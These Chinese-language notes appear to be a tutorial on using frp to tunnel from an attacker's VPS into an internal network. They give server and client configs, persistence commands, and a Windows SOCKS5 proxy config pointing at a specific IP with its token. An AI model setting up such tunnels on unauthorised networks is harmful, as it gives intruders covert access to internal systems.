在vps上建立frp服务端用来反向代理内网中的frp客户端,然后攻击者就可以通过自己的vps,来访问到内网中的服务器了。

vps配置(服务端)

由于其作为服务端所以可以把客户端的ini给删掉

先cd到frp的文件下:

rm -f frpc frpc.ini
vim frps.ini
[common]
bind_port = 7000
dashboard_port = 7500
token = your token
dashboard_user = admin
dashboard_pwd = your password
vhost_http_port = 10080
vhost_https_port = 10443

服务端运行:

./frps -c frps.ini

直接ctrl+c就关了

后台运行:

nohup ./frps -c frps.ini >/dev/null 2>&1 &

image-20200928215029822

image-20200928215848275

客户端配置:
wget https://github.com/fatedier/frp/releases/download/v0.17.0/frp_0.17.0_linux_arm.tar.gz
tar -zxvf frp_0.17.0_linux_arm.tar.gz
cd frp_0.17.0_linux_arm
sudo vim ./frpc.ini
[common]
server_addr = your_server_ip #VPS服务器IP
server_port = 7000 #端口,与服务端bind_port一致

#临时启动
./frpc -c ./frpc.ini

#后台保持启动
nohup ./frpc -c ./frpc.ini &

#启动frpc
systemctl daemon-reload
systemctl start frpc

#设置为开机启动
systemctl enable frpc

windows客户端配置:

[common]
server_addr = 175.24.19.33
server_port = 7000
token = Cupid
health_check_type = tcp
health_check_interval_s = 100



[web] 
remote_port = 7002          
plugin = socks5            
use_encryption = true         
use_compression = true
local_ip=127.0.0.1
local_port=80

[http_proxy]
type=tcp
remote_port=9000
plugin= socks5

记住一定要删去windows上面的#注释

image-20201025161758526